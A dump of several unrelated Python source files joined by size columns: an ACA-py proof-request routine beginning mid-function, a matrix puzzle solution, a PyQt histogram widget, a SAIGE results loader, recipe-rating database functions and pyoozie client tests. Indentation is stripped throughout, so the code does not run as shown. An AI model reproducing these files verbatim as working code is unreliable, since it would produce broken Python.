response = aca_client.create_proof_request(presentation_configuration.to_json())
print('PROOF CREATE', response)
public_did = aca_client.get_public_did()
print('DID', public_did)
endpoint = aca_client.get_endpoint_url()
print('ENDPOINT', endpoint)
presentation_request = PresentationFactory.from_params(
presentation_request=response.get("presentation_request"),
p_id=response.get("thread_id"),
verkey=[public_did.get("verkey")],
endpoint=endpoint,
).to_json()
print('PROOF REQUEST ', presentation_request)
presentation_request_id = response["presentation_exchange_id"]
session = AuthSession.objects.create(
presentation_record_id=pres_req_conf_id,
presentation_request_id=presentation_request_id,
presentation_request=presentation_request,
request_parameters=request_parameters,
expired_timestamp=timezone.now() + timedelta(minutes=60),
)
url, b64_presentation = create_short_url(presentation_request)
mapped_url = MappedUrl.objects.create(url=url, session=session)
short_url = mapped_url.get_short_url()
return short_url, str(session.pk), presentation_request_id, b64_presentation
@sync_to_async
def getPresentationConfig(pres_req_conf_id: str):
return PresentationConfigurations.objects.get(
id=pres_req_conf_id
)
@sync_to_async
def createSession(pres_req_conf_id, presentation_request_id, presentation_request, request_parameters, url):
session = AuthSession.objects.create(
presentation_record_id=pres_req_conf_id,
presentation_request_id=presentation_request_id,
presentation_request=presentation_request,
request_parameters=request_parameters,
expired_timestamp= timezone.now() + timedelta(minutes=60),
)
mapped_url = MappedUrl.objects.create(url=url, session=session)
print(mapped_url)
short_url = mapped_url.get_short_url()
print(short_url)
return session, mapped_url, short_url
async def authorization_async(pres_req_conf_id: str, request_parameters: dict):
# Based on the aca-py agent you wish to control
# print('AGENT CONNECT')
agent_controller = AriesAgentController(admin_url=settings.ACA_PY_URL)
# print('ACAPY AGENT CONNECTED')
# print('WEBHOOOKS STARTING')
# await asyncio.gather(agent_controller.init_webhook_server(webhook_host=WEBHOOK_HOST, webhook_port=WEBHOOK_PORT, webhook_base=WEBHOOK_BASE))
# print('WEBHOOOKS STARTED')
presentation_configuration = await getPresentationConfig(pres_req_conf_id)
print('PRESENTATION CONFIG: ', presentation_configuration)
# response = await agent_controller.proofs.create_request(presentation_configuration.to_json())
response = await asyncio.gather(agent_controller.proofs.create_request(presentation_configuration.to_json()))
response = response[0]
print('PROOF CREATE: ', response)
# TODO - the current DID of the Agent is already ledgered on Stagingnet
# This creates a scenario where the endpoint being fetched is wrong
# Need to update the code so that new DIDs can be ledgered to stagingnet together with endpoints
public_did = await asyncio.gather(agent_controller.wallet.get_public_did())
public_did = public_did[0]['result']
print('PUBLIC DID: ', public_did)
endpoint = await asyncio.gather(agent_controller.ledger.get_did_endpoint(public_did['did']))
endpoint = endpoint[0]['endpoint']
print('ENDPOINT: ', endpoint)
# TODO - this will wail due to no TAA accepted on ledger
TAA_response = await agent_controller.ledger.get_taa()
TAA = TAA_response['result']['taa_record']
TAA['mechanism'] = "service_agreement"
# print(TAA)
TAA_accept = await agent_controller.ledger.accept_taa(TAA)
## Will return {} if successful
print(TAA_accept)
await asyncio.gather(agent_controller.wallet.set_did_endpoint(public_did['did'], settings.ACA_PY_TRANSPORT_URL, 'Endpoint'))
endpoint = await asyncio.gather(agent_controller.ledger.get_did_endpoint(public_did['did']))
endpoint = endpoint[0]['endpoint']
print('ENDPOINT ', endpoint)
presentation_request = PresentationFactory.from_params(
presentation_request=response.get("presentation_request"),
p_id=response.get("thread_id"),
verkey=[public_did.get("verkey")],
endpoint=endpoint,
).to_json()
print('PROOF REQUEST: ', presentation_request)
presentation_request_id = response["presentation_exchange_id"]
url, b64_presentation = create_short_url(presentation_request)
print(url)
session, mapped_url, short_url = await createSession(pres_req_conf_id, presentation_request_id, presentation_request, request_parameters, url)
print('SESSION ', session)
print('sessionpk: ', str(session.pk))
print('mapped_url: ', mapped_url)
print('short_url: ', short_url)
print('presx_id: ', presentation_request_id)
print('b64 presx: ', b64_presentation)
await agent_controller.terminate()
return short_url, str(session.pk), presentation_request_id, b64_presentation
| 5,978 | 1,854 |
a=[];b=[];t=[];task=[0]*5;n=['Youngki','Jinwoo','Jungwoo','Junsuk','Inseo']
for _ in range(5):
a.append([int(i) for i in input().split()])
t.append([0]*5)
for _ in range(5):
b.append([int(i) for i in input().split()])
for i in range(5):
for j in range(5):
for k in range(5):
t[i][j]+=a[i][k]*b[k][j]
for i in range(5):
task[i]=sum(t[i])
task=task[::-1]
print(n[task.index(min(task))])
| 425 | 195 |
"""Class :py:class:`IVSpectrum` is a QWidget with histogram, two axes, and color bar
====================================================================================
Usage ::
# Run test: python lcls2/psana/psana/graphqt/IVSpectrum.py
from psana.graphqt.IVSpectrum import IVSpectrum
w = IVSpectrum()
Created on 2021-06-22 by Mikhail Dubrovin
"""
import logging
logger = logging.getLogger(__name__)
from psana.graphqt.FWViewHist import FWViewHist
from psana.graphqt.FWViewAxis import FWViewAxis
from psana.graphqt.FWViewColorBar import FWViewColorBar
import psana.graphqt.ColorTable as ct
from PyQt5.QtWidgets import QWidget, QGridLayout, QPushButton, QTextEdit
from PyQt5.QtCore import Qt, QRectF
def test_image():
import psana.pyalgos.generic.NDArrGenerators as ag
return ag.random_standard((8,12), mu=0, sigma=10)
class IVSpectrum(QWidget):
"""QWidget for Image Viewer"""
def __init__(self, **kwargs):
parent = kwargs.get('parent', None)
image = kwargs.get('image', test_image())
QWidget.__init__(self, parent)
ctab = ct.color_table_interpolated()
rs=QRectF(0, 0, 100, 1000)
self.whis = FWViewHist(self, rs, origin='DR', scale_ctl='V', fgcolor='yellow', bgcolor='dark', orient='V')
self.wcbar = FWViewColorBar(self, coltab=ctab, orient='V')
r = self.whis.sceneRect()
rscx = QRectF(r.x(), 0, r.width(), 1)
rscy = QRectF(0, r.y(), 1, r.height())
self.wax = FWViewAxis(None, rscx, side='U', origin='UR', scale_ctl=True, wwidth=30, wlength=200)
self.way = FWViewAxis(None, rscy, side='L', origin='DL', scale_ctl=True, wwidth=60, wlength=200)
self.but_reset = QPushButton('Reset')
self.edi_info = QTextEdit('Info')
self.box = QGridLayout()
self.box.setSpacing(0)
self.box.setVerticalSpacing(0)
self.box.setHorizontalSpacing(0)
self.box.addWidget(self.edi_info, 0, 0, 1, 11)
self.box.addWidget(self.way, 1, 10, 9, 1)
self.box.addWidget(self.whis, 1, 0, 9, 10)
self.box.addWidget(self.wax, 10, 0, 1, 9)
self.box.addWidget(self.wcbar, 1, 9, 9, 1)
self.box.addWidget(self.but_reset, 10, 9, 1, 2, alignment=Qt.AlignCenter)
self.setLayout(self.box)
self.set_tool_tips()
self.set_style()
self.connect_scene_rect_changed()
self.but_reset.clicked.connect(self.on_but_reset)
def connect_scene_rect_changed(self):
self.whis.connect_scene_rect_changed_to(self.on_whis_scene_rect_changed)
self.wax.connect_scene_rect_changed_to(self.on_wax_scene_rect_changed)
self.way.connect_scene_rect_changed_to(self.on_way_scene_rect_changed)
def disconnect_scene_rect_changed(self):
self.whis.disconnect_scene_rect_changed_from(self.on_whis_scene_rect_changed)
self.wax.disconnect_scene_rect_changed_from(self.on_wax_scene_rect_changed)
self.way.disconnect_scene_rect_changed_from(self.on_way_scene_rect_changed)
def on_but_reset(self):
logger.debug('on_but_reset')
if self.whis is not None:
self.whis.reset_original_size()
def on_whis_scene_rect_changed(self, r):
#logger.debug('on_whis_scene_rect_changed: %s'%str(r))
self.wax.set_view(rs=QRectF(r.x(), 0, r.width(), 1))
self.way.set_view(rs=QRectF(0, r.y(), 1, r.height()))
self.update_info()
def on_wax_scene_rect_changed(self, r):
#logger.debug('on_wax_scene_rect_changed: %s'%str(r))
rs = self.whis.scene().sceneRect()
self.whis.set_view(rs=QRectF(r.x(), rs.y(), r.width(), rs.height()))
def on_way_scene_rect_changed(self, r):
#logger.debug('on_way_scene_rect_changed: %s'%str(r))
rs = self.whis.scene().sceneRect()
self.whis.set_view(rs=QRectF(rs.x(), r.y(), rs.width(), r.height()))
self.update_info()
def update_info(self):
r = self.whis.scene().sceneRect()
self.edi_info.setText('Spectrum min: %d max: %d' % (r.y(), r.y()+r.height()))
def set_tool_tips(self):
self.whis.setToolTip('Spectrum')
def set_style(self):
self.layout().setContentsMargins(0,0,0,0)
#self.but_reset.setFixedSize(60,30)
self.wcbar.setFixedWidth(25)
#self.edi_info.setFixedHeight(100)
self.edi_info.setMaximumHeight(50)
def set_pixmap_from_arr(self, arr, set_def=True):
"""shortcat to image"""
self.whis.set_pixmap_from_arr(arr, set_def)
def reset_original_size(self):
"""shortcat to image"""
self.whis.reset_original_size()
if __name__ == "__main__":
import os
import sys
os.environ['LIBGL_ALWAYS_INDIRECT'] = '1' #export LIBGL_ALWAYS_INDIRECT=1
from PyQt5.QtWidgets import QApplication
logging.basicConfig(format='[%(levelname).1s] L%(lineno)04d %(name)s : %(message)s', level=logging.DEBUG)
app = QApplication(sys.argv)
w = IVSpectrum()
w.setGeometry(100, 50, 300, 800)
w.setWindowTitle('Image with two axes')
w.show()
app.exec_()
del w
del app
# EOF
| 5,163 | 1,992 |
#!/usr/bin/env python3
__author__ = 'konradk'
from ukb_common import *
import argparse
import tempfile
PHENO_KEY_FIELDS = ('trait_type', 'phenocode', 'pheno_sex', 'coding', 'modifier')
def main(args):
hl.init(master=f'local[{args.n_threads}]',
log=hl.utils.timestamp_path(os.path.join(tempfile.gettempdir(), 'load_results'), suffix='.log'),
default_reference=args.reference)
cases, controls = get_cases_and_controls_from_log(args.saige_run_log_format)
quantitative_trait = args.trait_type in ('continuous', 'biomarkers')
heritability = get_heritability_from_log(args.null_glmm_log, quantitative_trait) if args.null_glmm_log else -1.0
inv_normalized = get_inverse_normalize_status(args.null_glmm_log) if args.null_glmm_log else 'NA'
saige_version = get_saige_version_from_log(args.null_glmm_log) if args.null_glmm_log else 'NA'
extension = 'single.txt' if args.analysis_type == 'gene' else 'single_variant.txt'
pheno_key_dict = {k: getattr(args, k) for k in PHENO_KEY_FIELDS}
if args.analysis_type == 'gene':
load_gene_data(args.input_dir, pheno_key_dict, args.gene_map_ht_raw_path, cases, controls, heritability, saige_version, inv_normalized, args.overwrite)
load_variant_data(args.input_dir, pheno_key_dict, args.ukb_vep_ht_path, extension, cases, controls, heritability, saige_version, inv_normalized, args.overwrite,
args.legacy_annotations)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--input_dir', help='Input directory', required=True)
parser.add_argument('--trait_type', help='Trait type', required=True)
parser.add_argument('--phenocode', help='Phenotype ID', required=True)
parser.add_argument('--pheno_sex', help='Phenotype sex', default='both_sexes')
parser.add_argument('--coding', help='Phenotype coding', default='')
parser.add_argument('--modifier', help='Phenotype modifier', default='')
parser.add_argument('--null_glmm_log', help='Path to log file from null model')
parser.add_argument('--saige_run_log_format', help='Path to log file from SAIGE test with {chr} placeholder', required=True)
parser.add_argument('--analysis_type', help='Analysis type', choices=('gene', 'variant'), default='gene')
parser.add_argument('--reference', help='Reference genome', default='GRCh38')
parser.add_argument('--gene_map_ht_raw_path', help='Path to raw gene map')
parser.add_argument('--ukb_vep_ht_path', help='Path to UKB VEP data', required=True)
parser.add_argument('--n_threads', help='Number of threads to run', type=int, default=8)
parser.add_argument('--legacy_annotations', help='Use old annotation picking (preferred for genotype data)', action='store_true')
parser.add_argument('--overwrite', help='Overwrite everything', action='store_true')
args = parser.parse_args()
main(args) | 2,912 | 988 |
"""All DB functions for the Bewertung table"""
from typing import List
from typing import Union
import sqlalchemy
from sqlalchemy.orm import Session
from db.base import BewertungRecipe
from db.base import Person
from db.crud.user import get_user_by_mail
from schemes import scheme_recipe
from schemes import scheme_user
from schemes.exceptions import DatabaseException
from schemes.exceptions import DuplicateEntry
from schemes.exceptions import UserNotFound
from tools.my_logging import logger
def get_bewertung_from_user_to_recipe(
db: Session, user: scheme_user.UserBase, recipe: scheme_recipe.RecipeBase
) -> BewertungRecipe:
"""Return a specific bewertung from a user to only one recipe
Args:
db (Session): Session to the DB
user (scheme_user.UserBase): Specifie the User
recipe (scheme_recipe.RecipeBase): Specifie the reciepe
Returns:
BewertungRecipe: Return one bewertung that match the recipe - user
"""
return (
db.query(BewertungRecipe)
.join(Person, Person.email == BewertungRecipe.person_email)
.filter(Person.email == user.email)
.filter(BewertungRecipe.rezept_id == recipe.id)
.first()
)
def get_all_user_bewertungen(db: Session, user: scheme_user.UserBase) -> Union[List[BewertungRecipe], None]:
"""Return all bewertugen from one to the recipes User
Args:
db (Session): Session to the DB
user (scheme_user.UserBase): The user to select
Returns:
Union[List[BewertungRecipe], None]
"""
user: Person = get_user_by_mail(db, user.email)
if user is None:
return None
else:
return user.bewertungenRezept
def create_bewertung(db: Session, assessment: scheme_recipe.RecipeBewertungCreate) -> BewertungRecipe:
"""Create / Add a Bewertung to the DB. Timestamp and ID will set automatic.
Args:
db (Session): Session to the DB
assessment (scheme_recipe.RecipeBewertungCreate): Bewertung to add. This include the
Person and Recipe for the mapping of the Bewertung
Raises:
UserNotFound: If the user does not exist
DuplicateEntry: Duplicate Primary Key
Returns:
BewertungRecipe: Return if success
"""
if get_user_by_mail(db, assessment.person.email) is None:
raise UserNotFound(f"User {assessment.person.email} does not exist", assessment.person.email)
db_assessment = BewertungRecipe(
person_email=assessment.person.email,
rezept_id=assessment.recipe.id,
rezept_name=assessment.name,
kommentar=assessment.comment,
rating=assessment.rating,
)
try:
db.add(db_assessment)
db.commit()
db.refresh(db_assessment)
logger.info(
"Added assessment to db... recipe id:%s\temail:%s\trating:%s\tcomment:%s",
db_assessment.rezept_id,
db_assessment.person_email,
db_assessment.rating,
db_assessment.kommentar,
)
return db_assessment
except sqlalchemy.exc.IntegrityError as error:
raise DuplicateEntry("Assessment already exist") from error
def update_assessment(
db: Session, old_bewertung: scheme_recipe.RecipeBewertungCreate, new_bewertung: scheme_recipe.RecipeBewertungCreate
) -> BewertungRecipe:
"""Update the comment and rating of a bewertung
Args:
db (Session): Session to the DB
old_bewertung (scheme_recipe.RecipeBewertungCreate): The old Bewertung
new_bewertung (scheme_recipe.RecipeBewertungCreate): The updated Bewertung
Returns:
BewertungRecipe: New Bewertung from `get_bewertung_from_user_to_recipe`
"""
rows = (
db.query(BewertungRecipe)
.filter(BewertungRecipe.person_email == old_bewertung.person.email)
.filter(BewertungRecipe.rezept_id == old_bewertung.recipe.id)
.update({BewertungRecipe.kommentar: new_bewertung.comment, BewertungRecipe.rating: new_bewertung.rating})
)
if rows == 0:
raise DatabaseException("Can not update assessment. Does the User and the Recipe exist?")
db.commit()
logger.info("Updated bewertung %s - %s", old_bewertung.person.email, old_bewertung.recipe.id)
return get_bewertung_from_user_to_recipe(db, new_bewertung.person, new_bewertung.recipe)
def delete_bewertung(db: Session, user: scheme_user.UserBase, recipe: scheme_recipe.RecipeBase) -> int:
"""Delete one Bewertung
Args:
db (Session): Session to the db
user (scheme_user.User): The owner of the Bewertung
recipe (scheme_recipe.RecipeBase): The corrosponding Recipe
Returns:
int: Number of effected rows
"""
rows = (
db.query(BewertungRecipe)
.filter(BewertungRecipe.person_email == user.email, BewertungRecipe.rezept_id == recipe.id)
.delete()
)
db.commit()
logger.info("Deleted bewertung %s - %s", user.email, recipe.id)
return rows
| 4,981 | 1,595 |
# Copyright (c) 2017 "Shopify inc." All rights reserved.
# Use of this source code is governed by a MIT-style license that can be found in the LICENSE file.
from __future__ import unicode_literals
import copy
import mock
import pytest
import requests_mock
import requests
from pyoozie import exceptions
from pyoozie import model
from pyoozie import client
from pyoozie import xml
# TODO: share these with test_model.py?
SAMPLE_COORD_ID = '0123456-123456789012345-oozie-oozi-C'
SAMPLE_COORD_ACTION = '0123456-123456789012345-oozie-oozi-C@12'
SAMPLE_WF_ID = '0123456-123456789012345-oozie-oozi-W'
SAMPLE_WF_ACTION = '0123456-123456789012345-oozie-oozi-W@foo'
@pytest.fixture
def oozie_config():
return {
'url': 'http://localhost:11000/oozie',
'user': 'oozie',
'timeout': 30,
'verbose': False,
'launcher_memory_in_mb': '5000',
'launcher_queue': 'test.ignore',
}
@pytest.fixture
def api(oozie_config):
with mock.patch('pyoozie.client.OozieClient._test_connection'):
yield client.OozieClient(**oozie_config)
@pytest.fixture
def api_with_session(oozie_config):
with mock.patch('pyoozie.client.OozieClient._test_connection'):
session = requests.Session()
session.headers.update({'test-header': 'true'})
yield client.OozieClient(session=session, **oozie_config)
@pytest.fixture
def sample_coordinator_running(api):
info = {
'coordJobId': SAMPLE_COORD_ID,
'status': 'RUNNING'
}
return model.Coordinator(api, info, None)
@pytest.fixture
def sample_coordinator_suspended(api):
info = {
'coordJobId': SAMPLE_COORD_ID,
'status': 'SUSPENDED'
}
return model.Coordinator(api, info, None)
@pytest.fixture
def sample_coordinator_killed(api):
info = {
'coordJobId': SAMPLE_COORD_ID,
'status': 'KILLED'
}
return model.Coordinator(api, info, None)
@pytest.fixture
def sample_coordinator_action_running(api, sample_coordinator_running):
info = {
'id': SAMPLE_COORD_ACTION,
'status': 'RUNNING'
}
action = model.CoordinatorAction(api, info, sample_coordinator_running)
action.parent().actions = {12: action}
return action
@pytest.fixture
def sample_coordinator_action_suspended(api, sample_coordinator_running):
info = {
'id': SAMPLE_COORD_ACTION,
'status': 'SUSPENDED'
}
action = model.CoordinatorAction(api, info, sample_coordinator_running)
action.parent().actions = {12: action}
return action
@pytest.fixture
def sample_coordinator_action_killed(api, sample_coordinator_running):
info = {
'id': SAMPLE_COORD_ACTION,
'status': 'KILLED'
}
action = model.CoordinatorAction(api, info, sample_coordinator_running)
action.parent().actions = {12: action}
return action
@pytest.fixture
def sample_coordinator_action_killed_with_killed_coordinator(api, sample_coordinator_killed):
info = {
'id': SAMPLE_COORD_ACTION,
'status': 'KILLED'
}
action = model.CoordinatorAction(api, info, sample_coordinator_killed)
action.parent().actions = {12: action}
return action
@pytest.fixture
def sample_workflow_running(api):
info = {
'id': SAMPLE_WF_ID,
'status': 'RUNNING'
}
return model.Workflow(api, info, None)
@pytest.fixture
def sample_workflow_suspended(api):
info = {
'id': SAMPLE_WF_ID,
'status': 'SUSPENDED'
}
return model.Workflow(api, info, None)
@pytest.fixture
def sample_workflow_killed(api):
info = {
'id': SAMPLE_WF_ID,
'status': 'KILLED'
}
return model.Workflow(api, info, None)
@pytest.fixture
def sample_workflow_prep(api):
info = {
'id': SAMPLE_WF_ID,
'status': 'PREP'
}
return model.Workflow(api, info, None)
class TestOozieClientCore(object):
@mock.patch('pyoozie.client.OozieClient._test_connection')
def test_construction(self, mock_test_conn, oozie_config):
api = client.OozieClient(**oozie_config)
assert not mock_test_conn.called
assert api._url == 'http://localhost:11000/oozie'
assert api._session
@mock.patch('pyoozie.client.OozieClient._test_connection')
def test_construction_custom_session(self, mock_test_conn, oozie_config):
session = requests.Session()
session.auth = ('user', 'pass')
api = client.OozieClient(session=session, **oozie_config)
assert not mock_test_conn.called
assert api._session.auth == session.auth
def test_test_connection(self, oozie_config):
with requests_mock.mock() as m:
session = requests.Session()
m.get('http://localhost:11000/oozie/versions', text='[0, 1, 2]')
client.OozieClient(**oozie_config)._test_connection()
client.OozieClient(session=session, **oozie_config)._test_connection()
m.get('http://localhost:11000/oozie/versions', text='[0, 1]')
with pytest.raises(exceptions.OozieException) as err:
client.OozieClient(**oozie_config)._test_connection()
assert 'does not support API version 2' in str(err)
m.get('http://localhost:11000/oozie/versions', status_code=404)
with pytest.raises(exceptions.OozieException) as err:
client.OozieClient(**oozie_config)._test_connection()
assert 'Unable to contact Oozie server' in str(err)
m.get('http://localhost:11000/oozie/versions', text='>>> fail <<<')
with pytest.raises(exceptions.OozieException) as err:
client.OozieClient(**oozie_config)._test_connection()
assert 'Invalid response from Oozie server' in str(err)
def test_test_connection_is_called_once(self, oozie_config):
with requests_mock.mock() as m:
m.get('http://localhost:11000/oozie/v2/admin/build-version', text='{}')
with mock.patch('pyoozie.client.OozieClient._test_connection') as m_test:
oozie_client = client.OozieClient(**oozie_config)
oozie_client.admin_build_version()
oozie_client.admin_build_version()
m_test.assert_called_once_with()
def test_request(self, api):
with requests_mock.mock() as m:
m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}')
result = api._request('GET', 'endpoint', None, None)
assert result['result'] == 'pass'
with requests_mock.mock() as m:
m.get('http://localhost:11000/oozie/v2/endpoint')
result = api._request('GET', 'endpoint', None, None)
assert result is None
with requests_mock.mock() as m:
m.get('http://localhost:11000/oozie/v2/endpoint', text='>>> fail <<<')
with pytest.raises(exceptions.OozieException) as err:
api._request('GET', 'endpoint', None, None)
assert 'Invalid response from Oozie server' in str(err)
def test_request_uses_session_params(self, api_with_session):
with requests_mock.mock() as m:
m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}')
result = api_with_session._request('GET', 'endpoint', None, None)
assert result['result'] == 'pass'
assert m.last_request.headers['test-header'] == 'true'
def test_get(self, api):
with requests_mock.mock() as m:
m.get('http://localhost:11000/oozie/v2/endpoint', text='{"result": "pass"}')
result = api._get('endpoint')
assert result['result'] == 'pass'
def test_put(self, api):
with requests_mock.mock() as m:
headers = {'Content-Type': 'application/xml'}
m.put('http://localhost:11000/oozie/v2/endpoint', request_headers=headers)
result = api._put('endpoint')
assert result is None
def test_post(self, api):
with requests_mock.mock() as m:
headers = {'Content-Type': 'application/xml'}
m.post('http://localhost:11000/oozie/v2/endpoint', request_headers=headers, text='{"result": "pass"}')
result = api._post('endpoint', content='<xml/>')
assert result['result'] == 'pass'
def test_headers(self, api):
headers = api._headers()
assert headers == {}
headers = api._headers(content_type='foo/bar')
assert headers == {'Content-Type': 'foo/bar'}
class TestOozieClientAdmin(object):
@pytest.mark.parametrize("function, endpoint", [
('admin_status', 'status'),
('admin_os_env', 'os-env'),
('admin_java_properties', 'java-sys-properties'),
('admin_configuration', 'configuration'),
('admin_instrumentation', 'instrumentation'),
('admin_metrics', 'metrics'),
('admin_build_version', 'build-version'),
('admin_available_timezones', 'available-timezones'),
('admin_queue_dump', 'queue-dump'),
('admin_available_oozie_servers', 'available-oozie-servers'),
])
def test_simple_admin(self, function, endpoint, api):
with mock.patch.object(api, '_get', return_value=True) as mock_get:
assert api.__getattribute__(function)()
mock_get.assert_called_with('admin/' + endpoint)
def test_admin_list_sharelib(self, api):
reply = {
'sharelib': [
{'name': 'oozie'},
{'name': 'hive'},
{'name': 'distcp'},
{'name': 'hcatalog'},
{'name': 'sqoop'},
{'name': 'mapreduce-streaming'},
{'name': 'spark'},
{'name': 'hive2'},
{'name': 'pig'}
]
}
expected = ['oozie', 'hive', 'distcp', 'hcatalog', 'sqoop', 'mapreduce-streaming', 'spark', 'hive2', 'pig']
with mock.patch.object(api, '_get', return_value=reply) as mock_get:
assert api.admin_list_sharelib() == expected
mock_get.assert_called_with('admin/list_sharelib')
def test_admin_list_all_sharelib(self, api):
libs = {
'admin/list_sharelib?lib=oozie': {'sharelib': [{'files': ['oozie1', 'oozie2'], 'name': 'oozie'}]},
'admin/list_sharelib?lib=distcp': {'sharelib': [{'files': ['distcp1', 'distcp2'], 'name': 'distcp'}]},
}
expected = {
'oozie': ['oozie1', 'oozie2'],
'distcp': ['distcp1', 'distcp2'],
}
with mock.patch.object(api, 'admin_list_sharelib', return_value=['oozie', 'distcp']):
with mock.patch.object(api, '_get') as mock_get:
mock_get.side_effect = lambda endpoint: libs[endpoint]
result = api.admin_list_all_sharelib()
assert result == expected
class TestOozieClientJobsQuery(object):
def test_jobs_query_workflow_parameters(self, api):
mock_result = {
'total': 0,
'workflows': []
}
with mock.patch.object(api, '_get') as mock_get:
mock_get.return_value = mock_result
api._jobs_query(model.ArtifactType.Workflow)
mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000')
api._jobs_query(model.ArtifactType.Workflow, user='john_doe')
mock_get.assert_called_with('jobs?jobtype=wf&filter=user=john_doe&offset=1&len=5000')
api._jobs_query(model.ArtifactType.Workflow, name='my_workflow')
mock_get.assert_called_with('jobs?jobtype=wf&filter=name=my_workflow&offset=1&len=5000')
api._jobs_query(model.ArtifactType.Workflow, status=model.WorkflowStatus.RUNNING)
mock_get.assert_called_with('jobs?jobtype=wf&filter=status=RUNNING&offset=1&len=5000')
api._jobs_query(model.ArtifactType.Workflow, status=model.WorkflowStatus.running())
mock_get.assert_called_with('jobs?jobtype=wf&filter=status=RUNNING;status=SUSPENDED&offset=1&len=5000')
api._jobs_query(
model.ArtifactType.Workflow,
user='john_doe',
name='my_workflow',
status=model.WorkflowStatus.running())
mock_get.assert_called_with('jobs?jobtype=wf&filter=user=john_doe;name=my_workflow;status=RUNNING;'
'status=SUSPENDED&offset=1&len=5000')
def test_jobs_query_coordinator_parameters(self, api):
mock_result = {
'total': 0,
'coordinatorjobs': []
}
with mock.patch.object(api, '_get') as mock_get:
mock_get.return_value = mock_result
api._jobs_query(model.ArtifactType.Coordinator)
mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000')
api._jobs_query(model.ArtifactType.Coordinator, user='john_doe')
mock_get.assert_called_with('jobs?jobtype=coordinator&filter=user=john_doe&offset=1&len=5000')
api._jobs_query(model.ArtifactType.Coordinator, name='my_coordinator')
mock_get.assert_called_with('jobs?jobtype=coordinator&filter=name=my_coordinator&offset=1&len=5000')
api._jobs_query(model.ArtifactType.Coordinator, status=model.CoordinatorStatus.RUNNING)
mock_get.assert_called_with('jobs?jobtype=coordinator&filter=status=RUNNING&offset=1&len=5000')
api._jobs_query(model.ArtifactType.Coordinator, status=model.CoordinatorStatus.running())
mock_get.assert_called_with('jobs?jobtype=coordinator&filter=status=RUNNING;status=RUNNINGWITHERROR;'
'status=SUSPENDED;status=SUSPENDEDWITHERROR&offset=1&len=5000')
api._jobs_query(
model.ArtifactType.Coordinator,
user='john_doe',
name='my_coordinator',
status=model.CoordinatorStatus.running())
mock_get.assert_called_with('jobs?jobtype=coordinator&filter=user=john_doe;name=my_coordinator;'
'status=RUNNING;status=RUNNINGWITHERROR;status=SUSPENDED;'
'status=SUSPENDEDWITHERROR&offset=1&len=5000')
def test_jobs_query_bad_parameters(self, api):
with pytest.raises(KeyError) as err:
api._jobs_query(model.ArtifactType.CoordinatorAction)
assert 'ArtifactType.CoordinatorAction' in str(err)
with pytest.raises(KeyError) as err:
api._jobs_query(model.ArtifactType.WorkflowAction)
assert 'ArtifactType.WorkflowAction' in str(err)
@mock.patch.object(model.Workflow, 'fill_in_details', side_effect=lambda c: c, autospec=True)
def test_jobs_query_workflow_pagination(self, _, api):
mock_results = iter(
[
{
'total': 5001,
'workflows': [{'id': '1-W'}, {'id': '2-W'}]
},
{
'total': 5001,
'workflows': [{'id': '3-W'}]
}
]
)
with mock.patch.object(api, '_get') as mock_get:
mock_get.side_effect = lambda url: next(mock_results)
result = api._jobs_query(model.ArtifactType.Workflow)
assert len(result) == 3
mock_get.assert_any_call('jobs?jobtype=wf&offset=1&len=5000')
mock_get.assert_any_call('jobs?jobtype=wf&offset=5001&len=5000')
with pytest.raises(StopIteration):
next(mock_results)
@pytest.mark.parametrize('limit, expected_result_count, expected_queries', [
(0, 3, ['jobs?jobtype=coordinator&offset=1&len=5000', 'jobs?jobtype=coordinator&offset=5001&len=5000']),
(2, 2, ['jobs?jobtype=coordinator&offset=1&len=2']),
(6000, 3, ['jobs?jobtype=coordinator&offset=1&len=5000', 'jobs?jobtype=coordinator&offset=5001&len=5000'])
])
@mock.patch.object(model.Coordinator, 'fill_in_details', side_effect=lambda c: c, autospec=True)
def test_jobs_query_coordinator_pagination(self, _, limit, expected_result_count, expected_queries, api):
mock_results = iter(
[
{
'total': 5001,
'coordinatorjobs': [{'coordJobId': '1-C'}, {'coordJobId': '2-C'}]
},
{
'total': 5001,
'coordinatorjobs': [{'coordJobId': '3-C'}]
}
]
)
with mock.patch.object(api, '_get') as mock_get:
mock_get.side_effect = lambda url: next(mock_results)
result = api._jobs_query(model.ArtifactType.Coordinator, limit=limit)
assert len(result) == expected_result_count
mock_get.assert_has_calls(mock.call(query) for query in expected_queries)
@mock.patch.object(model.Workflow, 'fill_in_details', side_effect=lambda c: c, autospec=True)
def test_jobs_query_workflow_details(self, fill_in_details, api):
mock_result = {
'total': 1,
'workflows': [{'id': '1-W'}]
}
with mock.patch.object(api, '_get') as mock_get:
mock_get.return_value = mock_result
api._jobs_query(model.ArtifactType.Workflow, details=False)
mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000')
assert not fill_in_details.called
api._jobs_query(model.ArtifactType.Workflow, details=True)
mock_get.assert_called_with('jobs?jobtype=wf&offset=1&len=5000')
assert fill_in_details.called
@mock.patch.object(model.Coordinator, 'fill_in_details', side_effect=lambda c: c, autospec=True)
def test_jobs_query_coordinator_details(self, fill_in_details, api):
mock_result = {
'total': 1,
'coordinatorjobs': [{'coordJobId': '1-C'}]
}
with mock.patch.object(api, '_get') as mock_get:
mock_get.return_value = mock_result
api._jobs_query(model.ArtifactType.Coordinator, details=False)
mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000')
assert not fill_in_details.called
api._jobs_query(model.ArtifactType.Coordinator, details=True)
mock_get.assert_called_with('jobs?jobtype=coordinator&offset=1&len=5000')
assert fill_in_details.called
def test_jobs_all_workflows(self, api, sample_workflow_running):
with mock.patch.object(api, '_jobs_query') as mock_query:
mock_query.return_value = [sample_workflow_running]
api.jobs_all_workflows()
mock_query.assert_called_with(model.ArtifactType.Workflow, name=None, user=None, limit=0)
api.jobs_all_workflows(name='my_workflow')
mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, limit=0)
api.jobs_all_workflows(user='john_doe')
mock_query.assert_called_with(model.ArtifactType.Workflow, name=None, user='john_doe', limit=0)
api.jobs_all_workflows(name='my_workflow', user='john_doe')
mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user='john_doe', limit=0)
api.jobs_all_workflows(name='my_workflow', limit=10)
mock_query.assert_called_with(model.ArtifactType.Workflow, name='my_workflow', user=None, limit=10)
